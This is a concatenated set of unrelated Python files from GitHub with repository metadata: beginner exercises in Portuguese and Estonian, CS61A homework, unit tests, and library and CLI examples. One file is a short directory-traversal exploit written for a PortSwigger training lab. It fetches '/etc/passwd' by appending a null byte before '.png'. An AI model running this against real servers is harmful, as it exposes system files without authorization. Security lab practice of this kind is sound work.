pythonProject/MUNDO 2/Desafio 54.py
|
lucasjlgc/Aulas-de-Python-
|
6aaed1c660487a680e9c449210600ccdfa326612
|
[
"MIT"
] | 1 |
2021-06-25T15:29:11.000Z
|
2021-06-25T15:29:11.000Z
|
pythonProject/MUNDO 2/Desafio 54.py
|
lucasjlgc/Aulas-de-Python-
|
6aaed1c660487a680e9c449210600ccdfa326612
|
[
"MIT"
] | null | null | null |
#Leia o ano de nascimento de 7 pessoas e mostre quantas ja atingiram a maioridade e quantas ainda não
for c in range(1,8):
p=int(input('Qual o ano de seu nascimento? '))
a=2021-p
if a>= 18:
print('A pessoa numero {} já é maior de idade'.format(c))
else:
print('A pessoa numero {} não é maior de idade!'.format(c))
| 29.083333 | 101 | 0.638968 | 63 | 349 | 3.539683 | 0.619048 | 0.035874 | 0.053812 | 0.161435 | 0.179372 | 0.179372 | 0 | 0 | 0 | 0 | 0 | 0.034483 | 0.252149 | 349 | 11 | 102 | 31.727273 | 0.819923 | 0.286533 | 0 | 0 | 0 | 0 | 0.435484 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.285714 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
0af8af43646ac075b324487dffc3942d97354220
| 1,145 |
py
|
Python
|
examples/rpc_server_side.py
|
calendar42/SleekXMPP--XEP-0080-
|
d7bd5fd29f26a5d7de872a49ff63a353b8043e49
|
[
"BSD-3-Clause"
] | 1 |
2016-10-24T05:30:25.000Z
|
2016-10-24T05:30:25.000Z
|
examples/rpc_server_side.py
|
vijayp/SleekXMPP
|
b2e7f57334d27f140f079213c2016615b7168742
|
[
"BSD-3-Clause"
] | null | null | null |
examples/rpc_server_side.py
|
vijayp/SleekXMPP
|
b2e7f57334d27f140f079213c2016615b7168742
|
[
"BSD-3-Clause"
] | null | null | null |
"""
SleekXMPP: The Sleek XMPP Library
Copyright (C) 2011 Dann Martens
This file is part of SleekXMPP.
See the file LICENSE for copying permission.
"""
from sleekxmpp.plugins.xep_0009.remote import Endpoint, remote, Remote, \
ANY_ALL
import threading
class Thermostat(Endpoint):
def FQN(self):
return 'thermostat'
def __init(self, initial_temperature):
self._temperature = initial_temperature
self._event = threading.Event()
@remote
def set_temperature(self, temperature):
print("Setting temperature to %s" % temperature)
self._temperature = temperature
@remote
def get_temperature(self):
return self._temperature
@remote(False)
def release(self):
self._event.set()
def wait_for_release(self):
self._event.wait()
def main():
session = Remote.new_session('sleek@xmpp.org/rpc', '*****')
thermostat = session.new_handler(ANY_ALL, Thermostat, 18)
thermostat.wait_for_release()
session.close()
if __name__ == '__main__':
main()
| 22.019231 | 73 | 0.627074 | 125 | 1,145 | 5.512 | 0.472 | 0.108853 | 0.113208 | 0.058055 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012063 | 0.275983 | 1,145 | 52 | 74 | 22.019231 | 0.819059 | 0.125764 | 0 | 0.071429 | 0 | 0 | 0.067485 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.071429 | 0.071429 | 0.428571 | 0.035714 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
0afbde7fb6ef3a1d965ab24316c2720252ada994
| 970 |
py
|
Python
|
csv2googlesheets/to_google_sheets.py
|
AlexSkrn/csv2googlesheets
|
71656dcc6827b1c58ffe80bc55aa6f1ee816f216
|
[
"MIT"
] | null | null | null |
csv2googlesheets/to_google_sheets.py
|
AlexSkrn/csv2googlesheets
|
71656dcc6827b1c58ffe80bc55aa6f1ee816f216
|
[
"MIT"
] | null | null | null |
csv2googlesheets/to_google_sheets.py
|
AlexSkrn/csv2googlesheets
|
71656dcc6827b1c58ffe80bc55aa6f1ee816f216
|
[
"MIT"
] | null | null | null |
"""This module provides a console interface to convert CSV to Google Sheets."""
from csv2googlesheets.gapi_authorization import auth_with_google
from csv2googlesheets.gapi_create_sheet import create_sheet
from csv2googlesheets.gapi_write_to_sheet import write_to_sheet
from csv2googlesheets.parse_file import build_spreadsheet_title
from csv2googlesheets.parse_file import parse_file
from csv2googlesheets.parse_cli_args import parse_cli_args
def main():
"""Control the flow of operations to write data from csv to G Sheets."""
cli_args = parse_cli_args()
values = parse_file(path=cli_args.csv)
spreadsheet_title = build_spreadsheet_title(cli_args.csv)
google_service = auth_with_google(path_creds=cli_args.credentials_json)
spreadsheet_id = create_sheet(google_service, spreadsheet_title)
write_to_sheet(
google_service,
sheet_id=spreadsheet_id,
values=values,
)
if __name__ == '__main__':
main()
| 32.333333 | 79 | 0.786598 | 131 | 970 | 5.427481 | 0.351145 | 0.068917 | 0.101266 | 0.081575 | 0.098453 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007308 | 0.153608 | 970 | 29 | 80 | 33.448276 | 0.858709 | 0.14433 | 0 | 0 | 0 | 0 | 0.009768 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.052632 | false | 0 | 0.315789 | 0 | 0.368421 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 |
0
| 1 |
e40169279b6d0abaccc4f8f3610827c98bbcceff
| 6,197 |
py
|
Python
|
Overview/11 - funktsioonid.py
|
priidupaomets/python_kursus
|
731ab386ca40c321288659db21db23912ca7f8dd
|
[
"MIT"
] | 1 |
2021-02-19T15:21:28.000Z
|
2021-02-19T15:21:28.000Z
|
Overview/11 - funktsioonid.py
|
priidupaomets/python_kursus
|
731ab386ca40c321288659db21db23912ca7f8dd
|
[
"MIT"
] | null | null | null |
Overview/11 - funktsioonid.py
|
priidupaomets/python_kursus
|
731ab386ca40c321288659db21db23912ca7f8dd
|
[
"MIT"
] | 1 |
2018-03-24T11:01:46.000Z
|
2018-03-24T11:01:46.000Z
|
"""
funktsioonid.py
Funktsioonide ja protseduuride kasutamine
"""
#
# Protseduur
#
def minu_funktsioon():
print("See on protseduur")
# Kutsume funktsiooni välja
minu_funktsioon()
#
# Funktsioon
#
def liida(num1, num2):
return num1 + num2
sum = liida(3, 5)
print(sum)
# Näide vaikeväärtuste kasutamisest
# def funk(arg1 = väärtus1, arg2 = väärtus2)
# pass
def funk(arg1 = 0, arg2 = "Test"):
print(arg1, arg2)
funk() # Kutsume funktsiooni välja ilma argumente kaasa andmata
#
# Algarvude leidmine
#
def isprime(n):
if n <= 1:
return False
for i in range(2, n):
if n % i == 0:
return False
else:
return True
# Kustume funktsiooni testimiseks välja
n = 5
if isprime(n):
print(f"{n} ON algarv") # Kasutame f-formaatimisstringi, mis lubab muutuja otse stringi sisse panna
else:
print(f"{n} EI OLE algarv")
def list_primes(max_num = 100):
for n in range(2, max_num):
if isprime(n):
print(n, end = ' ', flush = True)
print()
list_primes()
#
# Muutuva arvu argumentidega funktsioonid
#
# Lisame lihtsalt uusi argumente
def summa(num1, num2, num3):
return num1 + num2 + num3
print(summa(1, 2, 3)) # Töötab
print(summa(1, 2)) # Saame vea, kuna uus funktsioon nõuab 3 argumenti
# Katsetame funktsiooni ülelaadimist (function overloading või method overloading)
def summa(num1, num2):
return num1 + num2
def summa(num1, num2, num3):
return num1 + num2 + num3
print(summa(1, 2)) # Saame vea, kuna viimane def kirjutab eelmise üle
print(summa(1, 2, 3))
# Katsetame vaikeväärtustega funktsioone
def summa(num1, num2, num3 = 0, num4 = 0):
return num1 + num2 + num3 + num4
print(summa(1, 2))
print(summa(1, 2, 3))
print(summa(1, 2, 3, 4))
#print(summa(1, 2, 3, 4, 5)) # Selle tööle saamiseks peame f-ni muutma
def keskmine(num1, num2, num3 = 0, num4 = 0):
sum = num1 + num2 + num3 + num4 # Sama, mis summa(num1, num2, num3, num4)
argumente = 4.0
return sum / argumente
print(keskmine(1, 2)) # Ilmselgelt vale tulemus (1.5 asemel 0.75)
print(keskmine(1, 2, 3)) # Ka vale tulemus (2 asemel 1.5)
print(keskmine(1, 2, 3, 4)) # Õige tulemus
# Täiendame argumentide arvu leidmist
def keskmine(num1, num2, num3 = 0, num4 = 0):
sum = num1 + num2 + num3 + num4 # Sama, mis summa(num1, num2, num3, num4)
argumente = 2.0 # Minimaalselt 2
if num3 > 0:
argumente = argumente + 1
if num4 > 0:
argumente = argumente + 1
return sum / argumente
print(keskmine(1, 2)) # Õige tulemus
print(keskmine(1, 2, 3)) # Õige tulemus
print(keskmine(1, 2, 3, 4)) # Õige tulemus
print(keskmine(1, 2, 3, 0)) # Vale tulemus!
print(keskmine(1, 0, 3, 2)) # Õige tulemus!?! Kuidas see nüüd õige on - kas tulemus sõltub argumentide järjekorrast?
# Kasutame teistsugust vaikeväärtust
def keskmine(num1, num2, num3 = None, num4 = None):
sum = num1 + num2 # Ei saa kohe 4 arg'i kokku liita
argumente = 2.0 # Minimaalselt 2
if num3 is not None:
argumente += 1
sum = sum + num3
if num4 is not None:
argumente += 1
sum = sum + num4
return sum / argumente
print(keskmine(1, 2)) # Õige tulemus
print(keskmine(1, 2, 3)) # Õige tulemus
print(keskmine(1, 2, 3, 4)) # Õige tulemus
print(keskmine(1, 2, 3, 0)) # Õige tulemus!
print(keskmine(1, 0, 3, 2)) # Õige tulemus
# Proovime listiga argumente defineerida
def summa(numbrid=[]):
sum = 0
for num in numbrid:
sum += num
return sum
#print(summa(1)) # Ei tööta, kuna pole itereeritav tüüp
#print(summa(1, 2)) # Ei tööta, kuna pole massiiv
arvud=[1, 2]
print(summa(arvud))
arvud=[1, 2, 3]
print(summa(arvud))
arvud=[1, 2, 3, 4]
print(summa(arvud))
print(summa([1, 2, 3, 4, 5])) # Võime panna ka ilma vahemuutujata
arvud=[1]
print(summa(arvud))
def summa(*numbrid):
sum = 0
for num in numbrid:
sum += num
return sum
print(summa()) # Isegi see variant töötab
print(summa(1))
print(summa(1, 2))
arvud=[1, 2]
print(summa(*arvud)) # Ka siin tuleb '*' kasutada
arvud=[1, 2, 3]
print(summa(*arvud))
arvud=[1, 2, 3, 4]
print(summa(*arvud))
arvud=[1, 2, 3, 4, 5]
print(summa(*arvud))
arvud=[1]
print(summa(*arvud))
# Erinevat sort argumendid
def argfun(arg1, arg2, *args, kw1 = 1, kw2 = "True"):
print(arg1, arg2, *args, kw1, kw2)
argfun(1, 2, 3, 4, 5, kw1 = 10, kw2 = 12)
def argfun(**kwargs):
for (arg, val) in kwargs.items():
print(f"{arg}={val}", end = ' ')
print()
argfun(kw2 = 10, kw3 = 12, kw4 = 14)
def argfun(arg1, arg2, *args, **kwargs):
print(arg1, arg2, *args)
for (arg, val) in kwargs.items():
print(f"{arg}={val}", end = ' ')
print()
argfun(1, 2, 3, 4, 5, kw2 = 10, kw3 = 12, kw4 = 14)
def argfun(arg1, arg2, *args, kw1 = 1, kw2 = "True", **kwargs):
print(arg1, arg2, *args, kw1, kw2)
for (arg, val) in kwargs.items():
print(f"{arg}={val}", end = ' ')
print()
argfun(1, 2, 3, 4, 5, kw2 = 10, kw3 = 12, kw4 = 14)
# Kuidas garanteerida, et argumentideks on numbrid?
def numsum(*numbrid):
sum = 0
for num in numbrid:
if isinstance(num, int) or isinstance(num, float):
sum += num
return sum
def numcount(*numbrid):
count = 0
for num in numbrid:
if isinstance(num, int) or isinstance(num, float):
count += 1
return count
def numavg(*numbrid):
sum = numsum(*numbrid)
count = numcount(*numbrid)
return sum / (count * 1.0) # Võime jagatava teha float tüübiks
print(numsum(1))
print(numsum(1, 2))
print(numsum(1, 2, 3))
print(numsum(1, 2, 3, "4"))
print(numsum(1, None, 3, 4, 5))
print("-"*30)
print(numcount(1))
print(numcount(1, 2))
print(numcount(1, 2, 3))
print(numcount(1, 2, 3, "4"))
print(numcount(1, None, 3, 4, 5))
print("-"*30)
print(numavg(1))
print(numavg(1, 2))
print(numavg(1, 2, 3))
print(numavg(1, 2, 3, "4"))
print(numavg(1, None, 3, 4, 5))
print(numavg()) # Viga! Nulliga jagamine!!!
# Vigade haldamist vaatame peatselt ka lähemalt
| 24.01938 | 116 | 0.606745 | 916 | 6,197 | 4.098253 | 0.209607 | 0.021843 | 0.022376 | 0.015983 | 0.51252 | 0.428609 | 0.393713 | 0.333777 | 0.313266 | 0.283165 | 0 | 0.072966 | 0.250282 | 6,197 | 257 | 117 | 24.11284 | 0.735041 | 0.272229 | 0 | 0.563636 | 0 | 0 | 0.022732 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.127273 | false | 0 | 0 | 0.030303 | 0.224242 | 0.406061 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0
| 1 |
e40722bed82cf8f0cac95ef9146f043dd3dc25ca
| 5,318 |
py
|
Python
|
05-Environments/hw02/hw02/hw02.py
|
ericchen12377/CS61A_LearningDoc
|
31f23962b0e2834795bf61eeb0f4884cc5da1809
|
[
"MIT"
] | 2 |
2020-04-24T18:36:53.000Z
|
2020-04-25T00:15:55.000Z
|
05-Environments/hw02/hw02/hw02.py
|
ericchen12377/CS61A_LearningDoc
|
31f23962b0e2834795bf61eeb0f4884cc5da1809
|
[
"MIT"
] | null | null | null |
05-Environments/hw02/hw02/hw02.py
|
ericchen12377/CS61A_LearningDoc
|
31f23962b0e2834795bf61eeb0f4884cc5da1809
|
[
"MIT"
] | null | null | null |
""" Homework 2: Higher Order Functions"""
HW_SOURCE_FILE = 'hw02.py'
from operator import add, mul, sub
square = lambda x: x * x
identity = lambda x: x
triple = lambda x: 3 * x
increment = lambda x: x + 1
######################
# Required Questions #
######################
def product(n, f):
"""Return the product of the first n terms in a sequence.
n -- a positive integer
f -- a function that takes one argument to produce the term
>>> product(3, identity) # 1 * 2 * 3
6
>>> product(5, identity) # 1 * 2 * 3 * 4 * 5
120
>>> product(3, square) # 1^2 * 2^2 * 3^2
36
>>> product(5, square) # 1^2 * 2^2 * 3^2 * 4^2 * 5^2
14400
>>> product(3, increment) # (1+1) * (2+1) * (3+1)
24
>>> product(3, triple) # 1*3 * 2*3 * 3*3
162
"""
"*** YOUR CODE HERE ***"
result,k = 1,1
while k <= n:
result,k = f(k)*result, k + 1
return result
def accumulate(combiner, base, n, f):
"""Return the result of combining the first n terms in a sequence and base.
The terms to be combined are f(1), f(2), ..., f(n). combiner is a
two-argument commutative, associative function.
>>> accumulate(add, 0, 5, identity) # 0 + 1 + 2 + 3 + 4 + 5
15
>>> accumulate(add, 11, 5, identity) # 11 + 1 + 2 + 3 + 4 + 5
26
>>> accumulate(add, 11, 0, identity) # 11
11
>>> accumulate(add, 11, 3, square) # 11 + 1^2 + 2^2 + 3^2
25
>>> accumulate(mul, 2, 3, square) # 2 * 1^2 * 2^2 * 3^2
72
>>> accumulate(lambda x, y: x + y + 1, 2, 3, square)
19
>>> accumulate(lambda x, y: 2 * (x + y), 2, 3, square)
58
>>> accumulate(lambda x, y: (x + y) % 17, 19, 20, square)
16
"""
"*** YOUR CODE HERE ***"
result, k = base,1
while k <= n:
result, k = combiner(result,f(k)), k + 1
return result
def summation_using_accumulate(n, f):
"""Returns the sum of f(1) + ... + f(n). The implementation
uses accumulate.
>>> summation_using_accumulate(5, square)
55
>>> summation_using_accumulate(5, triple)
45
>>> from construct_check import check
>>> # ban iteration and recursion
>>> check(HW_SOURCE_FILE, 'summation_using_accumulate',
... ['Recursion', 'For', 'While'])
True
"""
"*** YOUR CODE HERE ***"
# result, k = 0, 1
# while k <= n:
# result, k = result + f(k), k + 1
return accumulate(add,0,n,f)
def product_using_accumulate(n, f):
"""An implementation of product using accumulate.
>>> product_using_accumulate(4, square)
576
>>> product_using_accumulate(6, triple)
524880
>>> from construct_check import check
>>> # ban iteration and recursion
>>> check(HW_SOURCE_FILE, 'product_using_accumulate',
... ['Recursion', 'For', 'While'])
True
"""
"*** YOUR CODE HERE ***"
# result, k = 1, 1
# while k <= n:
# result, k = result * f(k), k + 1
return accumulate(mul,1,n,f)
def compose1(h, g):
"""Return a function f, such that f(x) = h(g(x))."""
def f(x):
return h(g(x))
return f
def make_repeater(h, n):
"""Return the function that computes the nth application of h.
>>> add_three = make_repeater(increment, 3)
>>> add_three(5)
8
>>> make_repeater(triple, 5)(1) # 3 * 3 * 3 * 3 * 3 * 1
243
>>> make_repeater(square, 2)(5) # square(square(5))
625
>>> make_repeater(square, 4)(5) # square(square(square(square(5))))
152587890625
>>> make_repeater(square, 0)(5) # Yes, it makes sense to apply the function zero times!
5
"""
"*** YOUR CODE HERE ***"
def repeater(x):
result, k = x,1
while k <= n:
result,k = h(result), k + 1
return result
return repeater
##########################
# Just for fun Questions #
##########################
def zero(f):
return lambda x: x
def successor(n):
return lambda f: lambda x: f(n(f)(x))
def one(f):
"""Church numeral 1: same as successor(zero)"""
"*** YOUR CODE HERE ***"
return lambda x: f(x)
def two(f):
"""Church numeral 2: same as successor(successor(zero))"""
"*** YOUR CODE HERE ***"
return lambda x: f(f(x))
three = successor(two)
def church_to_int(n):
"""Convert the Church numeral n to a Python integer.
>>> church_to_int(zero)
0
>>> church_to_int(one)
1
>>> church_to_int(two)
2
>>> church_to_int(three)
3
"""
"*** YOUR CODE HERE ***"
return n(lambda x: x + 1)(0)
def add_church(m, n):
"""Return the Church numeral for m + n, for Church numerals m and n.
>>> church_to_int(add_church(two, three))
5
"""
"*** YOUR CODE HERE ***"
return lambda f: lambda x: m(f)(n(f)(x))
def mul_church(m, n):
"""Return the Church numeral for m * n, for Church numerals m and n.
>>> four = successor(three)
>>> church_to_int(mul_church(two, three))
6
>>> church_to_int(mul_church(three, four))
12
"""
"*** YOUR CODE HERE ***"
return lambda f: m(n(f))
def pow_church(m, n):
"""Return the Church numeral m ** n, for Church numerals m and n.
>>> church_to_int(pow_church(two, three))
8
>>> church_to_int(pow_church(three, two))
9
"""
"*** YOUR CODE HERE ***"
return n(m)
| 25.690821 | 92 | 0.548326 | 788 | 5,318 | 3.624365 | 0.178934 | 0.031863 | 0.046218 | 0.037815 | 0.382353 | 0.30042 | 0.248599 | 0.212185 | 0.212185 | 0.184874 | 0 | 0.057647 | 0.275856 | 5,318 | 206 | 93 | 25.815534 | 0.683978 | 0.587251 | 0 | 0.288136 | 0 | 0 | 0.150635 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.271186 | false | 0 | 0.016949 | 0.050847 | 0.559322 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
e409ad0c94dc67812d4ce4eb1f3a9b3b256b6a43
| 638 |
py
|
Python
|
acceptance/test/TestStartStopFeature.py
|
ismacaulay/qtcwatchdog
|
72f3588eef1019bac8788fa58c52722dfa7c4d28
|
[
"MIT"
] | null | null | null |
acceptance/test/TestStartStopFeature.py
|
ismacaulay/qtcwatchdog
|
72f3588eef1019bac8788fa58c52722dfa7c4d28
|
[
"MIT"
] | 12 |
2015-10-22T15:38:28.000Z
|
2016-03-22T18:53:57.000Z
|
acceptance/test/TestStartStopFeature.py
|
ismacaulay/qtcwatchdog
|
72f3588eef1019bac8788fa58c52722dfa7c4d28
|
[
"MIT"
] | null | null | null |
from acceptance.harness.acceptance_test import WatchdogAcceptanceTest
class TestStartStopFeature(WatchdogAcceptanceTest):
def test_willStartObserverWhenWatchdogStarted(self):
self.create_and_start_watchdog()
self.assertTrue(self.fs_observer.running)
def test_willStopObserverWhenWatchdogStopped(self):
self.create_and_start_watchdog()
self.watchdog.stop()
self.assertFalse(self.fs_observer.running)
def test_willJoinObserverThreadWhenWatchdogStopped(self):
self.create_and_start_watchdog()
self.watchdog.stop()
self.assertTrue(self.fs_observer.joined)
| 26.583333 | 69 | 0.761755 | 61 | 638 | 7.704918 | 0.393443 | 0.044681 | 0.089362 | 0.108511 | 0.476596 | 0.404255 | 0.285106 | 0.212766 | 0.212766 | 0.212766 | 0 | 0 | 0.166144 | 638 | 23 | 70 | 27.73913 | 0.883459 | 0 | 0 | 0.384615 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.230769 | 1 | 0.230769 | false | 0 | 0.076923 | 0 | 0.384615 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
e409e1ff47556f0c395cedaf6538d4e9082df50c
| 1,243 |
py
|
Python
|
neural_spline_flows/nde/transforms/transform_test.py
|
VincentStimper/nsf
|
6bde505639ebcb67bffa227ea0021e3de235e03d
|
[
"MIT"
] | null | null | null |
neural_spline_flows/nde/transforms/transform_test.py
|
VincentStimper/nsf
|
6bde505639ebcb67bffa227ea0021e3de235e03d
|
[
"MIT"
] | null | null | null |
neural_spline_flows/nde/transforms/transform_test.py
|
VincentStimper/nsf
|
6bde505639ebcb67bffa227ea0021e3de235e03d
|
[
"MIT"
] | null | null | null |
import torch
import torchtestcase
from neural_spline_flows.nde.transforms import base
class TransformTest(torchtestcase.TorchTestCase):
"""Base test for all transforms."""
def assert_tensor_is_good(self, tensor, shape=None):
self.assertIsInstance(tensor, torch.Tensor)
self.assertFalse(torch.isnan(tensor).any())
self.assertFalse(torch.isinf(tensor).any())
if shape is not None:
self.assertEqual(tensor.shape, torch.Size(shape))
def assert_forward_inverse_are_consistent(self, transform, inputs):
inverse = base.InverseTransform(transform)
identity = base.CompositeTransform([inverse, transform])
outputs, logabsdet = identity(inputs)
self.assert_tensor_is_good(outputs, shape=inputs.shape)
self.assert_tensor_is_good(logabsdet, shape=inputs.shape[:1])
self.assertEqual(outputs, inputs)
self.assertEqual(logabsdet, torch.zeros(inputs.shape[:1]))
def assertNotEqual(self, first, second, msg=None):
if ((self._eps and (first - second).abs().max().item() < self._eps) or
(not self._eps and torch.equal(first, second))):
self._fail_with_message(msg, "The tensors are _not_ different!")
| 37.666667 | 78 | 0.693484 | 149 | 1,243 | 5.630872 | 0.416107 | 0.042908 | 0.05006 | 0.064362 | 0.052443 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001992 | 0.192277 | 1,243 | 32 | 79 | 38.84375 | 0.833665 | 0.023331 | 0 | 0 | 0 | 0 | 0.026534 | 0 | 0 | 0 | 0 | 0 | 0.5 | 1 | 0.136364 | false | 0 | 0.136364 | 0 | 0.318182 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
e40c283a7830ae526fea47bfe3f1719fdb809be3
| 358 |
py
|
Python
|
directory-traversal/validate-file-extension-null-byte-bypass.py
|
brandonaltermatt/penetration-testing-scripts
|
433b5d000a5573e60b9d8e49932cedce74937ebc
|
[
"MIT"
] | null | null | null |
directory-traversal/validate-file-extension-null-byte-bypass.py
|
brandonaltermatt/penetration-testing-scripts
|
433b5d000a5573e60b9d8e49932cedce74937ebc
|
[
"MIT"
] | null | null | null |
directory-traversal/validate-file-extension-null-byte-bypass.py
|
brandonaltermatt/penetration-testing-scripts
|
433b5d000a5573e60b9d8e49932cedce74937ebc
|
[
"MIT"
] | null | null | null |
"""
https://portswigger.net/web-security/file-path-traversal/lab-validate-file-extension-null-byte-bypass
"""
import sys
import requests
site = sys.argv[1]
if 'https://' in site:
site = site.rstrip('/').lstrip('https://')
url = f'''https://{site}/image?filename=../../../etc/passwd%00.png'''
s = requests.Session()
resp = s.get(url)
print(resp.text)
| 21.058824 | 101 | 0.664804 | 52 | 358 | 4.576923 | 0.730769 | 0.067227 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009288 | 0.097765 | 358 | 17 | 102 | 21.058824 | 0.727554 | 0.282123 | 0 | 0 | 0 | 0 | 0.292 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.111111 | 0.222222 | 0 | 0.222222 | 0.111111 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 |
0
| 1 |
7c0efca532f7042e0db58c5e7fb4f25f0274261b
| 3,437 |
py
|
Python
|
Assignment Day 2 .py
|
ShubhamKahlon57/Letsupgrade-python-Batch-7
|
7989c2d2f17e58dd4ee8f278c37d2c1d18e5e3af
|
[
"Apache-2.0"
] | null | null | null |
Assignment Day 2 .py
|
ShubhamKahlon57/Letsupgrade-python-Batch-7
|
7989c2d2f17e58dd4ee8f278c37d2c1d18e5e3af
|
[
"Apache-2.0"
] | null | null | null |
Assignment Day 2 .py
|
ShubhamKahlon57/Letsupgrade-python-Batch-7
|
7989c2d2f17e58dd4ee8f278c37d2c1d18e5e3af
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# coding: utf-8
# In[ ]:
#List and function
# In[6]:
# empty list
my_list = []
# list of integers
my_list = [1, 2, 3]
# list with mixed data types
my_list = [1, "Hello", 3.4]
# In[7]:
# nested list
my_list = ["mouse", [8, 4, 6], ['a']]
# In[11]:
# List indexing
my_list = ['p', 'r', 'o', 'b', 'e']
# Output: p
print(my_list[0])
# Output: o
print(my_list[2])
# Output: e
print(my_list[4])
# Nested List
n_list = ["Happy", [2, 0, 1, 5]]
# Nested indexing
print(n_list[0][1])
print(n_list[1][3])
# Error! Only integer can be used for indexing
print(my_list[4])
# In[9]:
# Appending and Extending lists in Python
odd = [1, 3, 5]
odd.append(7)
print(odd)
odd.extend([9, 11, 13])
print(odd)
# In[13]:
# Deleting list items
my_list = ['p', 'r', 'o', 'b', 'l', 'e', 'm']
# delete one item
del my_list[2]
print(my_list)
# delete multiple items
del my_list[1:5]
print(my_list)
# delete entire list
del my_list
# In[14]:
# Appending and Extending lists in Python
odd = [1, 3, 5]
odd.append(7)
print(odd)
odd.extend([9, 11, 13])
print(odd)
# In[15]:
#Dictionary and function
# In[18]:
y_dict = {}
# dictionary with integer keys
my_dict = {1: 'apple', 2: 'ball'}
# dictionary with mixed keys
my_dict = {'name': 'John', 1: [2, 4, 3]}
# using dict()
my_dict = dict({1:'apple', 2:'ball'})
# from sequence having each item as a pair
my_dict = dict([(1,'apple'), (2,'ball')])
# In[20]:
# get vs [] for retrieving elements
my_dict = {'name': 'Jack', 'age': 26}
# Output: Jack
print(my_dict['name'])
# Output: 26
print(my_dict.get('age'))
# In[21]:
# Changing and adding Dictionary Elements
my_dict = {'name': 'Jack', 'age': 26}
# update value
my_dict['age'] = 27
#Output: {'age': 27, 'name': 'Jack'}
print(my_dict)
# add item
my_dict['address'] = 'Downtown'
# Output: {'address': 'Downtown', 'age': 27, 'name': 'Jack'}
print(my_dict)
# In[22]:
#Sets and its function
# In[23]:
my_set = {1, 2, 3}
print(my_set)
# In[24]:
my_set = {1.0, "Hello", (1, 2, 3)}
print(my_set)
# In[25]:
# set cannot have duplicates
my_set = {1, 2, 3, 4, 3, 2}
print(my_set)
# In[26]:
#Tuple and its method
# In[27]:
# Tuple having integers
my_tuple = (1, 2, 3)
print(my_tuple)
# In[28]:
my_tuple = ("hello")
print(type(my_tuple))
# In[30]:
# Accessing tuple elements using indexing
my_tuple = ('p','e','r','m','i','t')
print(my_tuple[0])
print(my_tuple[5])
# In[31]:
print(my_tuple[-1])
# In[32]:
print(my_tuple[-6])
# In[36]:
# Changing tuple values
my_tuple = (4, 2, 3, [6, 5])
# TypeError: 'tuple' object does not support item assignment
# my_tuple[1] = 9
# However, item of mutable element can be changed
my_tuple[3][0] = 9 # Output: (4, 2, 3, [9, 5])
print(my_tuple)
# Tuples can be reassigned
my_tuple = ('p', 'r', 'o', 'g', 'r', 'a', 'm', 'i', 'z')
# Output: ('p', 'r', 'o', 'g', 'r', 'a', 'm', 'i', 'z')
print(my_tuple)
# In[37]:
#String and its function
# In[38]:
# Python string examples - all assignments are identical.
String_var = 'Python'
String_var = "Python"
String_var = """Python"""
# with Triple quotes Strings can extend to multiple lines
String_var = """ This document will help you to
explore all the concepts
of Python Strings!!! """
# Replace "document" with "tutorial" and store in another variable
substr_var = String_var.replace("document", "tutorial")
print (substr_var)
# In[ ]:
